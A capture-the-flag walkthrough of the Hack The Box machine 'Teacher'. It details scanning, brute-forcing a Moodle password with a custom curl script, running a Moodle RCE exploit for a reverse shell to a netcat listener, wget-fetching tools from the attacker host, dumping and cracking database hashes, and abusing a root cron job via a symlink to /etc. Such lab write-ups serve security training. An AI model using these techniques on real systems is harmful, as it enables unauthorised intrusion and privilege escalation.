Teacher

From Luniwiki
Jump to: navigation, search

Back

Teacher01.png

Ports scan

u505@kali:~/HTB/Machines/Teacher$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.153 --rate=1000
[sudo] password for u505: 

Starting masscan 1.0.5 at 2020-02-17 15:06:13 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 80/tcp on 10.10.10.153


u505@kali:~/HTB/Machines/Teacher$ nmap -sC -sV 10.10.10.153
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-17 10:06 EST
Nmap scan report for teacher.htb (10.10.10.153)
Host is up (0.038s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blackhat highschool

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.12 seconds

Web enumeration

Teacher02.png

u505@kali:~/HTB/Machines/Teacher$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt,png,css,js" -r -f -t 50 -u http://10.10.10.153 --plain-text-report=dirsearch.txt

_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt, png, css, js | HTTP method: get | Threads: 50 | Wordlist size: 23054 | Recursion level: 1
Error Log: /opt/utils/dirsearch/logs/errors-20-02-17_10-16-55.log
Target: http://10.10.10.153
[10:16:55] Starting: [10:16:55] 403 - 300B - /.htpasswd.css [10:16:55] 403 - 299B - /.htpasswd.js [10:16:59] 403 - 300B - /.htpasswd.png [10:16:59] 403 - 300B - /.htpasswd.txt [10:17:11] 200 - 931B - /css/ [10:17:19] 200 - 3KB - /fonts/ [10:17:23] 403 - 293B - /icons/ [10:17:23] 200 - 15KB - /images/ [10:17:26] 403 - 298B - /javascript/ [10:17:26] 200 - 1KB - /js/ [10:17:30] 200 - 626B - /manual/ [10:17:33] 200 - 26KB - /moodle/ [10:17:38] 403 - 298B - /phpmyadmin/ [10:17:48] 403 - 301B - /server-status/ [10:18:04] Starting: css/ [10:18:04] 403 - 304B - /css/.htpasswd.css [10:18:04] 403 - 303B - /css/.htpasswd.js [10:18:04] 403 - 304B - /css/.htpasswd.png [10:18:04] 403 - 304B - /css/.htpasswd.txt [10:18:48] 200 - 34KB - /css/style.css [10:18:57] Starting: fonts/ [10:18:57] 403 - 306B - /fonts/.htpasswd.png [10:18:57] 403 - 306B - /fonts/.htpasswd.txt [10:18:57] 403 - 306B - /fonts/.htpasswd.css [10:18:57] 403 - 305B - /fonts/.htpasswd.js [10:19:49] Starting: icons/ [10:19:50] 403 - 306B - /icons/.htpasswd.css [10:19:50] 403 - 305B - /icons/.htpasswd.js [10:19:50] 403 - 306B - /icons/.htpasswd.png [10:19:50] 403 - 306B - /icons/.htpasswd.txt [10:19:54] 200 - 306B - /icons/a.png [10:19:59] 200 - 308B - /icons/back.png [10:20:00] 200 - 310B - /icons/binary.png [10:20:01] 200 - 215B - /icons/blank.png [10:20:01] 200 - 320B - /icons/broken.png [10:20:02] 200 - 299B - /icons/c.png [10:20:06] 200 - 1KB - /icons/compressed.png [10:20:09] 200 - 295B - /icons/dir.png [10:20:10] 200 - 256B - /icons/down.png [10:20:13] 200 - 296B - /icons/f.png [10:20:14] 200 - 295B - /icons/folder.png [10:20:15] 200 - 308B - /icons/forward.png [10:20:16] 200 - 275B - /icons/generic.png [10:20:18] 200 - 332B - /icons/index.png [10:20:21] 200 - 323B - /icons/layout.png [10:20:21] 200 - 257B - /icons/left.png [10:20:21] 200 - 314B - /icons/link.png [10:20:24] 200 - 272B - /icons/movie.png [10:20:27] 200 - 298B - /icons/p.png [10:20:27] 200 - 310B - /icons/patch.png [10:20:27] 200 - 304B - /icons/pdf.png [10:20:28] 200 - 319B - /icons/portal.png [10:20:30] 200 - 303B - /icons/ps.png [10:20:32] 200 - 254B - /icons/right.png [10:20:32] 200 - 290B - /icons/script.png [10:20:34] 403 - 299B - /icons/small/ [10:20:37] 200 - 261B - /icons/tar.png [10:20:38] 200 - 288B - /icons/text.png [10:20:39] 200 - 334B - /icons/transfer.png [10:20:41] 200 - 255B - /icons/up.png [10:20:45] 200 - 1KB - /icons/xml.png [10:20:46] Starting: images/ [10:20:46] 403 - 307B - /images/.htpasswd.txt [10:20:46] 403 - 307B - /images/.htpasswd.png [10:20:47] 403 - 307B - /images/.htpasswd.css [10:20:47] 403 - 306B - /images/.htpasswd.js [10:20:48] 200 - 5KB - /images/1.png [10:20:48] 200 - 7KB - /images/2.png [10:20:48] 200 - 9KB - /images/3.png [10:20:48] 200 - 5KB - /images/4.png [10:20:49] 200 - 200B - /images/5.png [10:21:16] 200 - 4KB - /images/logo.png [10:21:43] Starting: javascript/ [10:21:43] 403 - 311B - /javascript/.htpasswd.txt [10:21:44] 403 - 310B - /javascript/.htpasswd.js [10:21:44] 403 - 311B - /javascript/.htpasswd.png [10:21:44] 403 - 311B - /javascript/.htpasswd.css [10:22:09] 403 - 305B - /javascript/jquery/ [10:22:37] Starting: js/ [10:22:38] 403 - 303B - /js/.htpasswd.txt [10:22:38] 403 - 303B - /js/.htpasswd.png [10:22:38] 403 - 302B - /js/.htpasswd.js [10:22:38] 403 - 303B - /js/.htpasswd.css [10:23:16] 200 - 3KB - /js/main.js [10:23:25] 200 - 44KB - /js/plugins.js [10:23:46] Starting: manual/ [10:23:47] 403 - 306B - /manual/.htpasswd.js [10:23:47] 403 - 307B - /manual/.htpasswd.png [10:23:47] 403 - 307B - /manual/.htpasswd.css [10:23:47] 403 - 307B - /manual/.htpasswd.txt [10:24:05] 200 - 9KB - /manual/da/ [10:24:06] 200 - 9KB - /manual/de/ [10:24:10] 200 - 9KB - /manual/en/ [10:24:11] 200 - 10KB - /manual/es/ [10:24:14] 200 - 9KB - /manual/fr/ [10:24:18] 200 - 10KB - /manual/images/ [10:24:21] 200 - 10KB - /manual/ja/ [10:24:22] 200 - 8KB - /manual/ko/ [10:24:43] 200 - 3KB - /manual/style/ [10:24:45] 200 - 9KB - /manual/tr/ [10:24:48] 200 - 9KB - /manual/zh-cn/ [10:24:48] Starting: moodle/ [10:24:49] 403 - 307B - /moodle/.htpasswd.png [10:24:49] 403 - 307B - /moodle/.htpasswd.css [10:24:49] 403 - 306B - /moodle/.htpasswd.js [10:24:49] 403 - 307B - /moodle/.htpasswd.txt [10:24:51] 200 - 1KB - /moodle/analytics/ [10:24:51] 303 - 448B - /moodle/admin/ [10:24:52] 200 - 0B - /moodle/auth/ [10:24:52] 200 - 4KB - /moodle/backup/ [10:24:53] 200 - 1B - /moodle/blocks/ [10:24:53] 200 - 3KB - /moodle/cache/ [10:24:53] 303 - 440B - /moodle/blog/ [10:24:54] 303 - 442B - /moodle/calendar/ [10:24:56] 303 - 440B - /moodle/comment/ [10:24:59] 200 - 27KB - /moodle/course/ [10:25:07] 303 - 440B - /moodle/files/ [10:25:07] 200 - 1B - /moodle/filter/ [10:25:14] 200 - 26KB - /moodle/index.php/ [10:25:15] 200 - 2KB - /moodle/install/ [10:25:17] 200 - 1KB - /moodle/lang/ [10:25:18] 200 - 1B - /moodle/lib/ [10:25:19] 200 - 1KB - /moodle/local/ [10:25:20] 200 - 27KB - /moodle/login/ [10:25:22] 200 - 1KB - /moodle/media/ [10:25:22] 303 - 440B - /moodle/message/ [10:25:23] 200 - 0B - /moodle/mod/ [10:25:24] 303 - 440B - /moodle/my/ [10:25:25] 303 - 440B - /moodle/notes/ [10:25:30] 200 - 7KB - /moodle/pix/ [10:25:31] 200 - 2KB - /moodle/portfolio/ [10:25:34] 200 - 6KB - /moodle/question/ [10:25:34] 200 - 1KB - /moodle/README.txt [10:25:35] 200 - 4KB - /moodle/report/ [10:25:35] 200 - 7KB - /moodle/repository/ [10:25:36] 200 - 1KB - /moodle/rss/ [10:25:36] 200 - 26KB - /moodle/search/ [10:25:42] 303 - 440B - /moodle/tag/ [10:25:43] 303 - 440B - /moodle/theme/ [10:25:48] 200 - 3KB - /moodle/webservice/ [10:25:51] Starting: phpmyadmin/ [10:27:11] Starting: server-status/
Task Completed

Teacher03.png

Moodle is a free and open-source learning management system (LMS) written in PHP and distributed under the GNU General Public License.[3][4] Developed on pedagogical principles,[5][6] Moodle is used for blended learning, distance education, flipped classroom and other e-learning projects in schools, universities, workplaces and other sectors.[7][8][9]

With customizable management features, it is used to create private websites with online courses for educators and trainers to achieve learning goals.[10][11] Moodle (acronym for modular object-oriented dynamic learning environment) allows for extending and tailoring learning environments using community-sourced plugins.

Page gallery.tml

Teacher04.png

If we take a look at the code

Teacher05.png

u505@kali:~/HTB/Machines/Teacher$ '''curl http://teacher.htb/gallery.html'''
 <!DOCTYPE html>
 <!--[if IE 8]> <html class="ie8 oldie" lang="en"> <![endif]-->
 <!--[if gt IE 8]><!--> <html lang="en"> <!--<![endif]-->
 <head>
         <meta charset="utf-8">
         <title>Blackhat Highschool</title>
         <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no">
         <link rel="stylesheet" media="all" href="css/style.css">
         <!--[if lt IE 9]>
                 <script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
         <![endif]-->
 </head>
 <body>
 ...
                                                 <li>
                                                         <div class="slide">
                                                                 <ul>
                                                                         <li><a href="#"><img src="images/5.png" onerror="console.log('That\'s an F');" alt=""></a></li>
                                                                         <li><a href="#"><img src="images/5_2.png" alt=""></a></li>
                                                                         <li><a href="#"><img src="images/5_3.png" alt=""></a></li>
                                                                         <li><a href="#"><img src="images/5_4.png" alt=""></a></li>
                                                                         <li><a href="#"><img src="images/5_5.png" alt=""></a></li>
 ...

This image isn't rendered.

u505@kali:~/HTB/Machines/Teacher$ wget -q http://teacher.htb/images/5.png
u505@kali:~/HTB/Machines/Teacher$ file 5.png
5.png: ASCII text
u505@kali:~/HTB/Machines/Teacher$ cat 5.png
Hi Servicedesk,

I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.
Could you guys figure out what the last charachter is, or just reset it?
Thanks, Giovanni

Find moodle password with Burp

We need a list of characters to test the last letter of the password.

u505@kali:~/HTB/Machines/Teacher$ cat generatelist.sh
#!/bin/bash
for car in {{a..z},{A..Z},{0..9}}
do
echo $car
done
u505@kali:~/HTB/Machines/Teacher$ chmod +x generatelist.sh
u505@kali:~/HTB/Machines/Teacher$ ./generatelist.sh > list
u505@kali:~/HTB/Machines/Teacher$ cat /usr/share/seclists/Fuzzing/special-chars.txt >> list

We turn on burp suite to intercept the HTTP frame.

Teacher06.png

We send the packet to the Intruder module.

Teacher07.png

In the Intruder we delete all fields, we add one on the last character of the password, and remove the cookie line

Teacher08.png

On the payload tab, we load our list of characters, and start the attack.

Teacher09.png

During the attack, the length is always the same except for the character #

Teacher10.png

Find moodle password without Burp

An other way is to create our own script to check the password by command line.

u505@kali:~/HTB/Machines/Teacher$ vi testlogin.sh
u505@kali:~/HTB/Machines/Teacher$ cat testlogin.sh
NUM=1
cat list | while read car
do
USER=giovanni
PASS=Th4C00lTheacha${car}
POSTVAL="anchor=&username=${USER}&password=${PASS}"
LENPSTVAL=${#POSTVAL}
echo  "Testing $USER $PASS" > result/test${NUM}.out
printf  "Testing $USER $PASS"
MoodleSession=`curl -i -s -k -X 'GET'  -H 'Host: 10.10.10.153' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' g -H 'DNT: 1' -H 'Connection: close' -H 'Upgrade-Insecure-Requests: 1'  'http://10.10.10.153/moodle/login/index.php' | grep "Set-Cookie: MoodleSession" | cut -d '=' -f 2 | cut -d ';' -f 1`
curl -i -s -k -X 'POST' -H 'Host: 10.10.10.153' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' g -H 'Referer: http://10.10.10.153/moodle/login/index.php' -H 'Content-Type: application/x-www-form-urlencoded' -H "Content-Length: ${LENPSTVAL}" -H 'DNT: 1' -H 'Connection: close' -H "Cookie: MoodleSession=${MoodleSession}" -H 'Upgrade-Insecure-Requests: 1' -b "MoodleSession=${MoodleSession}" --data-binary "${POSTVAL}" 'http://10.10.10.153/moodle/login/index.php' >> result/test${NUM}.out
printf " --- file name: test${NUM}.out -- file lenth: `ls -l result/test${NUM}.out | awk '{print $5}'` \n"
NUM=`expr $NUM + 1 `
done
u505@kali:~/HTB/Machines/Teacher$ chmod +x testlogin.sh
u505@kali:~/HTB/Machines/Teacher$ mkdir result
u505@kali:~/HTB/Machines/Teacher$ ./testlogin.sh
Testing giovanni Th4C00lTheachaa --- file name: test1.out -- file lenth: 834
Testing giovanni Th4C00lTheachab --- file name: test2.out -- file lenth: 834
...
Testing giovanni Th4C00lTheacha@ --- file name: test65.out -- file lenth: 834
Testing giovanni Th4C00lTheacha# --- file name: test66.out -- file lenth: 1028
Testing giovanni Th4C00lTheacha$ --- file name: test67.out -- file lenth: 834
./testlogin.sh: line 13: printf: `%': missing format character
Testing giovanni Th4C00lTheacha --- file name: test68.out -- file lenth: 834
Testing giovanni Th4C00lTheacha^ --- file name: test69.out -- file lenth: 834
...
Testing giovanni Th4C00lTheacha< --- file name: test92.out -- file lenth: 834
Testing giovanni Th4C00lTheacha> --- file name: test93.out -- file lenth: 834

We can see that the file length is different for password Th4C00lTheacha#. Our script fails for character %.

Moodle vulnerability

We have access to the moodle application as a teacher.

Teacher11.png

u505@kali:~/HTB/Machines/Teacher$ searchsploit moodle
---------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                  |  Path
                                                                | (/usr/share/exploitdb/)
---------------------------------------------------------------- ----------------------------------------
Mambo Component Mam-Moodle alpha - Remote File Inclusion        | exploits/php/webapps/2064.txt
Moodle - Remote Command Execution (Metasploit)                  | exploits/linux/remote/29324.rb
Moodle 1.1/1.2 - Cross-Site Scripting                           | exploits/php/webapps/24071.txt
Moodle 1.5.2 - 'moodledata' Remote Session Disclosure           | exploits/php/webapps/3508.txt
Moodle 1.5/1.6 - '/mod/forum/discuss.php?navtail' Cross-Site Sc | exploits/php/webapps/29284.txt
Moodle 1.6dev - SQL Injection / Command Execution               | exploits/php/webapps/1312.php
Moodle 1.7.1 - 'index.php' Cross-Site Scripting                 | exploits/php/webapps/30261.txt
Moodle 1.8.3 - 'install.php' Cross-Site Scripting               | exploits/php/webapps/31020.txt
Moodle 1.8.4 - Remote Code Execution                            | exploits/php/webapps/6356.php
Moodle 1.9.3 - Remote Code Execution                            | exploits/php/webapps/7437.txt
Moodle 1.x - 'post.php' Cross-Site Scripting                    | exploits/php/webapps/24356.txt
Moodle 2.0.1 - 'PHPCOVERAGE_HOME' Cross-Site Scripting          | exploits/php/webapps/35297.txt
Moodle 2.3.8/2.4.5 - Multiple Vulnerabilities                   | exploits/php/webapps/28174.txt
Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site | exploits/php/webapps/36418.txt
Moodle 2.7 - Persistent Cross-Site Scripting                    | exploits/php/webapps/34169.txt
Moodle 2.x/3.x - SQL Injection                                  | exploits/php/webapps/41828.php
Moodle 3.4.1 - Remote Code Execution                            | exploits/php/webapps/46551.php
Moodle 3.6.3 - 'Install Plugin' Remote Command Execution (Metas | exploits/php/remote/46775.rb
Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure              | exploits/php/webapps/8297.txt
Moodle Blog 1.18.2.2/1.6.2 Module - SQL Injection               | exploits/php/webapps/28770.txt
Moodle Filepicker 3.5.2 - Server Side Request Forgery           | exploits/php/webapps/47177.txt
Moodle Help Script 1.x - Cross-Site Scripting                   | exploits/php/webapps/24279.txt
Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scrip | exploits/php/webapps/46881.txt
---------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
u505@kali:~/HTB/Machines/Teacher$ searchsploit -m 46551
 Exploit: Moodle 3.4.1 - Remote Code Execution
     URL: https://www.exploit-db.com/exploits/46551
    Path: /usr/share/exploitdb/exploits/php/webapps/46551.php
File Type: C++ source, ASCII text, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Teacher/46551.php

To run this exploit we need a valid user and password of a teacher and a valid id of a course.

Teacher12.png

Raise listener

u505@kali:~/HTB/Machines/Teacher$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Execute evil teacher bug

u505@kali:~/HTB/Machines/Teacher$ php 46551.php url=http://10.10.10.153/moodle/ user=giovanni pass="Th4C00lTheacha#" ip=10.10.14.26 port=4444 course=2
PHP Notice:  Undefined index: course in /opt/HTB/Machines/Teacher/46551.php on line 508

*------------------------------* * Noodle [Moodle RCE] (v3.4.1) * *------------------------------*
[!] Make sure you have a listener [!] at 10.10.14.26:4444
[*] Logging in as user giovanni with password Th4C00lTheacha# PHP Fatal error: Uncaught Error: Call to undefined function exploit\curl_init() in /opt/HTB/Machines/Teacher/46551.php:417 Stack trace: #0 /opt/HTB/Machines/Teacher/46551.php(105): exploit\moodle->httpPost('/login/index.ph...', Array) #1 /opt/HTB/Machines/Teacher/46551.php(84): exploit\moodle->login('http://10.10.10...', 'giovanni', 'Th4C00lTheacha#') #2 /opt/HTB/Machines/Teacher/46551.php(511): exploit\moodle->__construct('http://10.10.10...', 'giovanni', 'Th4C00lTheacha#', '10.10.14.26', '4444', NULL, false) #3 {main} thrown in /opt/HTB/Machines/Teacher/46551.php on line 417

We check the source code

u505@kali:~/HTB/Machines/Teacher$ vi +417 46551.php
           $curl = curl_init(sprintf("%s%s", $this->url, $url));

The php module needs to be installed.

u505@kali:~/HTB/Machines/Teacher$ sudo apt install php-curl

And we run the exploit

u505@kali:~/HTB/Machines/Teacher$ php 46551.php url=http://10.10.10.153/moodle/ user=giovanni pass="Th4C00lTheacha#" ip=10.10.14.26 port=4444 course=2

*------------------------------* * Noodle [Moodle RCE] (v3.4.1) * *------------------------------*
[!] Make sure you have a listener [!] at 10.10.14.26:4444
[*] Logging in as user giovanni with password Th4C00lTheacha# [+] Successful Login [>] Moodle Session 94i0d563nrguesgdhddnbt02n6 [>] Moodle Key ekQgRg8Bfc [*] Loading Course ID 2 [+] Successfully Loaded Course [*] Enable Editing [+] Successfully Enabled Course Editing [*] Adding Quiz [+] Successfully Added Quiz [*] Configuring New Quiz [+] Successfully Configured Quiz [*] Loading Edit Quiz Page [+] Successfully Loaded Edit Quiz Page [*] Adding Calculated Question [+] Successfully Added Calculation Question [*] Adding Evil Question [+] Successfully Created Evil Question [*] Sending Exploit
[>] You should receive a reverse shell attempt from the target at 10.10.14.26 on port 4444 [>] If connection was successful this program will wait here until you close the connection. [>] You should be able to Ctrl+C and retain the connection through netcat.

And the listener open a reverse shell

u505@kali:~/HTB/Machines/Teacher$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.153.
Ncat: Connection from 10.10.10.153:36368.
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@teacher:/var/www/html/moodle/question$ stty raw -echo
stty raw -echo

Local enumeration

As usual we upload tools to enumerate the local machine.

u505@kali:~/HTB/Machines/Teacher$ mkdir www
u505@kali:~/HTB/Machines/Teacher$ cd www/
u505@kali:~/HTB/Machines/Teacher/www$ cp /opt/utils/pspy/pspy64 ./
u505@kali:~/HTB/Machines/Teacher/www$ cp /opt/utils/LinEnum/LinEnum.sh ./
u505@kali:~/HTB/Machines/Teacher/www$ sudo python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

From the target box

www-data@teacher:/var/www/html/moodle/question$ cd /tmp/
www-data@teacher:/tmp$ wget -q http://10.10.14.26/pspy64
www-data@teacher:/tmp$ wget -q http://10.10.14.26/LinEnum.sh
www-data@teacher:/tmp$ chmod +x pspy64 LinEnum.sh

The LinEnum.sh doesn't provide usefull information

www-data@teacher:/var/www/html/moodle$ cat config.php
...
$CFG->dbname    = 'moodle';
$CFG->dbuser    = 'root';
$CFG->dbpass    = 'Welkom1!';
...

In the database moodle, we can access the mdl_user table

www-data@teacher:/var/www/html/moodle$ mysql -p -u root
Enter password: Welkom1!

Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 102 Server version: 10.1.26-MariaDB-0+deb9u1 Debian 9.1
Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> use moodle Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [moodle]> select username,password from mdl_user; +-------------+--------------------------------------------------------------+ | username | password | +-------------+--------------------------------------------------------------+ | guest | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO | | admin | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 | | giovanni | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO | | Giovannibak | 7a860966115182402ed06375cf0a22af | +-------------+--------------------------------------------------------------+ 4 rows in set (0.00 sec)

There are 3 hash bcrypt that require a lot of math power, but the account Giovannibak, the password is a md5 that is very easy to run through a dictionary attack.

2020/02/17 20:11:01 CMD: UID=0    PID=1780   | /usr/sbin/CRON -f
2020/02/17 20:11:01 CMD: UID=0    PID=1781   | /usr/sbin/CRON -f
2020/02/17 20:11:01 CMD: UID=0    PID=1782   | /bin/sh -c /usr/bin/backup.sh
2020/02/17 20:11:01 CMD: UID=0    PID=1783   | tar -czvf tmp/backup_courses.tar.gz courses/algebra
2020/02/17 20:11:01 CMD: UID=0    PID=1784   | tar -czvf tmp/backup_courses.tar.gz courses/algebra
2020/02/17 20:11:01 CMD: UID=0    PID=1785   | gzip
2020/02/17 20:11:01 CMD: UID=0    PID=1786   | /bin/bash /usr/bin/backup.sh
2020/02/17 20:11:01 CMD: UID=0    PID=1787   | tar -xf backup_courses.tar.gz
2020/02/17 20:11:01 CMD: UID=0    PID=1788   | /bin/bash /usr/bin/backup.sh

Pspy allows us to dicover a periodic task that runs with root user.

www-data@teacher:/var/www/html/moodle$ cat /usr/bin/backup.sh
#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;

But with user www-data, we are not allowed to go to these folders.

www-data@teacher:/var/www/html/moodle$ cd /home/giovanni/work
bash: cd: /home/giovanni/work: Permission denied


Crack of the hash

u505@kali:~/HTB/Machines/Teacher$ vi hash.txt
u505@kali:~/HTB/Machines/Teacher$ cat hash.txt
7a860966115182402ed06375cf0a22af
u505@kali:~/HTB/Machines/Teacher$ hashcat -m 0 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v5.1.0) starting...

* Device #2: Not a native Intel OpenCL runtime. Expect massive speed loss. You can use --force to override, but do not report related errors. nvmlDeviceGetFanSpeed(): Not Supported
OpenCL Platform #1: NVIDIA Corporation ====================================== * Device #1: GeForce GTX 960M, 501/2004 MB allocatable, 5MCU
OpenCL Platform #2: The pocl project ==================================== * Device #2: pthread-Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz, skipped.
Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1
Applicable optimizers: * Zero-Byte * Early-Skip * Not-Salted * Not-Iterated * Single-Hash * Single-Salt * Raw-Hash
Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256
ATTENTION! Pure (unoptimized) OpenCL kernels selected. This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance. If you want to switch to optimized OpenCL kernels, append -O to your commandline.
Watchdog: Temperature abort trigger set to 90c
* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=1 -D VENDOR_ID=32 -D CUDA_ARCH=500 -D AMD_ROCM=0 -D VECT_SIZE=1 -D DEVICE_TYPE=4 -D DGST_R0=0 -D DGST_R1=3 -D DGST_R2=2 -D DGST_R3=1 -D DGST_ELEM=4 -D KERN_TYPE=0 -D _unroll' * Device #1: Kernel m00000_a0-pure.408c2795.kernel not found in cache! Building may take a while...

Dictionary cache hit: * Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt * Passwords.: 14344384 * Bytes.....: 139921497 * Keyspace..: 14344384
7a860966115182402ed06375cf0a22af:expelled
Session..........: hashcat Status...........: Cracked Hash.Type........: MD5 Hash.Target......: 7a860966115182402ed06375cf0a22af Time.Started.....: Mon Feb 17 14:04:13 2020 (0 secs) Time.Estimated...: Mon Feb 17 14:04:13 2020 (0 secs) Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 12721.4 kH/s (2.56ms) @ Accel:1024 Loops:1 Thr:64 Vec:1 Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts Progress.........: 983040/14344384 (6.85%) Rejected.........: 0/983040 (0.00%) Restore.Point....: 655360/14344384 (4.57%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidates.#1....: grass4 -> computer? Hardware.Mon.#1..: Temp: 43c Util: 17% Core:1137MHz Mem:2505MHz Bus:16
Started: Mon Feb 17 14:04:09 2020 Stopped: Mon Feb 17 14:04:15 2020

The password is cracked nearly instantly.

User flag

www-data@teacher:/var/www/html/moodle$ su - giovanni
Password: expelled

giovanni@teacher:~$ whoami giovanni giovanni@teacher:~$ cat user.txt <USER_FLAG>

Privilege escalation

With user giovanni we can access the folder /home/giovanni/work.

giovanni@teacher:~/work$ cat /usr/bin/backup.sh
#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;

This script is simple, we could for example make a link of folder /root and redirect it to folder /home/giovanni/work/courses. In that way we would be able to read the root flag. But we really won't own the machine. An other strategy could be to link the folder /home/giovanni/work/tmp to the folder /etc, because the command chmod 777 * -R will gave us full access to the folder /etc, and we can manipulate important file.

giovanni@teacher:~/work$ ls -ltr
total 8
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27  2018 tmp
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27  2018 courses
giovanni@teacher:~/work$ mv tmp tmp.old
giovanni@teacher:~/work$ ln -s /etc tmp
giovanni@teacher:~/work$ ls -la
total 16
drwxr-xr-x 4 giovanni giovanni 4096 Feb 17 20:24 .
drwxr-x--- 4 giovanni giovanni 4096 Nov  4  2018 ..
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27  2018 courses
lrwxrwxrwx 1 giovanni giovanni    4 Feb 17 20:24 tmp -> /etc
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27  2018 tmp.old

After the run of the cron job

2020/02/17 20:26:01 CMD: UID=0    PID=1958   | tar -czvf tmp/backup_courses.tar.gz courses/algebra
2020/02/17 20:26:01 CMD: UID=0    PID=1959   | gzip
2020/02/17 20:26:01 CMD: UID=0    PID=1960   | /bin/bash /usr/bin/backup.sh
2020/02/17 20:26:01 CMD: UID=0    PID=1961   | tar -xf backup_courses.tar.gz
2020/02/17 20:26:01 CMD: UID=0    PID=1962   | "chmod 777 adduser.conf adjtime alternatives analog.cfg apache2 apm apparmor.d apt backup_courses.tar.gz bash.bashrc bash_completion bash_completion.d bindresvport.blacklist binfmt.d ca-certificates ca-certificates.conf ca-certificates.conf.dpkg-old calendar console-setup courses cron.d cron.daily cron.hourly cron.monthly crontab cron.weekly dbconfig-common dbus-1 debconf.conf debian_version default deluser.conf dhcp dictionaries-common discover.conf.d discover-modprobe.conf dpkg emacs environment fail2ban fonts fstab fuse.conf gai.conf groff group group- grub.d gshadow gshadow- gss hdparm.conf host.conf hostname hosts hosts.allow hosts.deny init init.d initramfs-tools inputrc insserv.conf.d iproute2 issue issue.net kernel kernel-img.conf ldap ld.so.cache ld.so.conf ld.so.conf.d libaudit.conf lighttpd locale.alias locale.gen localtime logcheck login.defs logrotate.conf logrotate.d machine-id magic magic.mime mailcap mailcap.order manpath.config mime.types mke2fs.conf modprobe.d modules modules-load.d monit motd mtab mysql nanorc network networks newt nsswitch.conf opt os-release pam.conf pam.d passwd passwd- perl php phpmyadmin profile profile.d protocols python python2.7 python3 python3.5 rc0.d rc1.d rc2.d rc3.d rc4.d rc5.d rc6.d rcS.d reportbug.conf resolv.conf rmt rpc rsyslog.conf rsyslog.d securetty security selinux services sgml shadow shadow- shells skel ssh ssl staff-group-for-usr-local subgid subgid- subuid subuid- sysctl.conf sysctl.d systemd terminfo timezone tmpfiles.d ucf.conf udev ufw update-motd.d vim vmware-tools wgetrc X11 xdg xml -R
2020/02/17 20:26:14 CMD: UID=0    PID=1963   |

The folder /etc is fully accessible. we can revert the action to let the script doing is original task

giovanni@teacher:~/work$ rm tmp
giovanni@teacher:~/work$ mv tmp.old tmp
giovanni@teacher:~/work$ cd /etc
